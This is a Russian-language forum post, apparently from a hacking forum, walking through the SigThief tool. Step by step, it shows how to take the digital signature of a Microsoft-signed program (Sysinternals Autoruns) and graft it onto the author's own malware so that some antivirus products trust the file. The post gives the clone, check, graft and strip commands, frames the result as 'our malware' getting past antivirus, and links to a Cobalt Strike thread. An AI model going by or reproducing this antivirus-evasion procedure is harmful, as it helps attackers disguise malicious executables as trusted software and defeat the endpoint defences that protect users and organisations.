Вышла месяц назад, так что довольно свежая, программа для ухода от некоторых антивирусов, путем цифровой подписи файла. Некоторые антивирусы обращают приоритетное внимание отдельным органам сертификации, не проверяя, действительно ли подпись действительна, и есть те, которые просто проверяют, что certTable заполняется некоторым значением.

Поэтому была и выпущена это программа для подмены цифровой подписи на фальшивую.

Ставится и пользоваться очень просто.

Ставим:

git clone https://github.com/secretsquirrel/SigThief

Смотрим, что предлагает эта тулза.

сd SigThief

python sigthief.py --help



Проверяем свой файл, если цифровая подпись?

python sigthief.py -i /путь к файлу -с



Видим,что подпись отсутствует.

Качаем с фирменного сайта Майкрософта какую нибудь программу, я качнул программу Марка Руссиновича авторунз.

И прикручиваем цифровую подпись старины Марка к нашему зловреду и сохраняем.

$ python sigthief.py -i /путь к файлу старины Марка.exe -t / путь к нашему зловреду.exe -o /tmp/название нашего готового файла.exe



Проверяем все ли на месте.



Как видим все нормуль - подпись есть, некоторые антивирусы успокоились.

Результат /threads/skripty-cobalt-strike-3-chast-2.455547/#post-4133957

Можно удалить свою цифровую подпись.

python sigthief.py -i путь к файлу.exe -T

А вообще в инструкции к программе имеются и другие функции.

Читаем тут https://github.com/secretsquirrel/SigThief